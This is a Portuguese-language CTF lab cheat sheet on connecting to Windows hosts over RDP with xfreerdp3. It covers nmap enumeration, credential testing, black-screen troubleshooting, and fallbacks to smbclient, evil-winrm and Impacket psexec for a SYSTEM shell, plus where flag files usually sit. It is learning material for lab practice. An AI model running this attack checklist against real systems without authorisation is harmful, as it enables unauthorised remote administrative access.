Skip to main content

xfreerdp3 (RDP - Remote Desktop Protocol) | Solyd One

  • xfreerdp3 (RDP - Remote Desktop Protocol) | Solyd One

1. Conceitos Fundamentais

SiglaSignificadoContexto
RDPRemote Desktop ProtocolAcesso remoto gráfico Windows
CLICommand Line InterfaceInteração via terminal
GUIGraphical User InterfaceInterface gráfica
TelnetProtocolo legado TCP 23Sem criptografia por padrão
ms-wbt-serverServiço RDP no NmapPorta 3389

2. Instalação no Kali (FreeRDP 3)

Kali Rolling usa FreeRDP 3.

sudo apt update
sudo apt install freerdp3-x11

Verificar:

xfreerdp3 /version

3. Enumeração Inicial

3.1 Verificar Porta RDP

nmap -p 3389 -sV 10.129.3.42

Saída típica:

3389/tcp open  ms-wbt-server

3.2 Verificar Segurança (Muito Importante)

nmap -p 3389 --script rdp-enum-encryption 10.129.3.42

Se aparecer:

CredSSP (NLA): SUCCESS

➡ O servidor exige /sec:nla


4. Padrão de Conexão que Funcionou no Lab

Você confirmou que este comando funcionou:

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator

Isso significa:

  • Servidor permite autenticação interativa
  • Senha pode ser solicitada via prompt
  • NLA negociado automaticamente

Esse passa a ser o padrão base recomendado.


5. Tabela — Explicação de Cada Opção

OpçãoSignificado TécnicoQuando Usar
/v:IPDefine o host remotoSempre obrigatório
/u:USERDefine o usuárioSempre necessário
/p:SENHADefine senha via CLIEvitar em ambientes reais (inseguro)
/cert:ignoreIgnora validação de certificado TLSQuase sempre necessário em CTF
/sec:nlaForça Network Level AuthenticationQuando CredSSP aparece no Nmap
/adminConecta à sessão administrativaQuando sessão normal falha
/size:WxHDefine resoluçãoAjuste visual
/bpp:16Bits por pixelTroubleshooting gráfico
-gdi:swForça renderização softwareResolver tela preta
/shell:cmd.exeInicia sessão direto no cmdEvitar GUI
+auth-onlyTesta credenciais sem abrir GUIValidação rápida

6. Fluxo Operacional Ideal em CTF

6.1 Testar Credencial

xfreerdp3 /v:10.129.3.42 /u:Administrator +auth-only /cert:ignore

Se retornar sucesso silencioso → credencial válida.


6.2 Conectar Interativo (Padrão Seguro)

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator

Senha será solicitada interativamente.


6.3 Se NLA for obrigatório

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator /sec:nla

7. Problema Encontrado — Tela Preta

Durante o laboratório ocorreu:

  • Login válido
  • Sessão criada
  • Tela preta
  • Cursor ativo
  • Conexão não caía

Diagnóstico:

Possível CausaExplicação
Explorer não iniciadoShell gráfico não carregou
Windows Server CoreNão possui GUI
Perfil corrompidoExplorer falha
Política restritivaBloqueio de sessão interativa

8. Troubleshooting Estruturado

8.1 Forçar Renderização Software

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator /sec:nla -gdi:sw /bpp:16

8.2 Forçar Sessão Administrativa

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator /sec:nla /admin

8.3 Ignorar GUI e Abrir Shell

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator /sec:nla /shell:cmd.exe

9. Alternativas Quando RDP Não Resolve

9.1 SMB

smbclient //10.129.3.42/C$ -U Administrator%

Pode falhar com:

NT_STATUS_CONNECTION_DISCONNECTED

9.2 WinRM

evil-winrm -i 10.129.3.42 -u Administrator -p ''

Pode retornar:

WinRMAuthorizationError

9.3 Execução Remota com Impacket (Estratégia Final)

sudo apt install python3-impacket
psexec.py Administrator@10.129.3.42

Se funcionar:

NT AUTHORITY\SYSTEM

10. Localização de Flags em Windows CTF

Locais comuns:

C:\Users\<user>\Desktop\user.txt
C:\Users\Administrator\Desktop\root.txt
C:\Users\Public\

Comandos:

cd C:\Users\Administrator\Desktop
dir
type *.txt

11. Resumo Estratégico

Quando encontrar:

  • RDP autentica
  • Tela preta
  • SMB falha
  • WinRM falha

Conclusão:

✔ Você tem credencial válida ✔ O problema é ambiente gráfico ✔ Use execução remota ou shell direto


12. Checklist Profissional de Ataque RDP

  1. nmap 3389
  2. rdp-enum-encryption
  3. Testar +auth-only
  4. Conectar interativo
  5. Forçar NLA se necessário
  6. Troubleshoot gráfico
  7. Testar SMB
  8. Testar WinRM
  9. Usar Impacket

13. Comando Base Recomendado (Final)

xfreerdp3 /v:10.129.3.42 /cert:ignore /u:Administrator

Motivo:

  • Simples
  • Seguro (senha interativa)
  • Compatível com FreeRDP 3
  • Funciona na maioria dos labs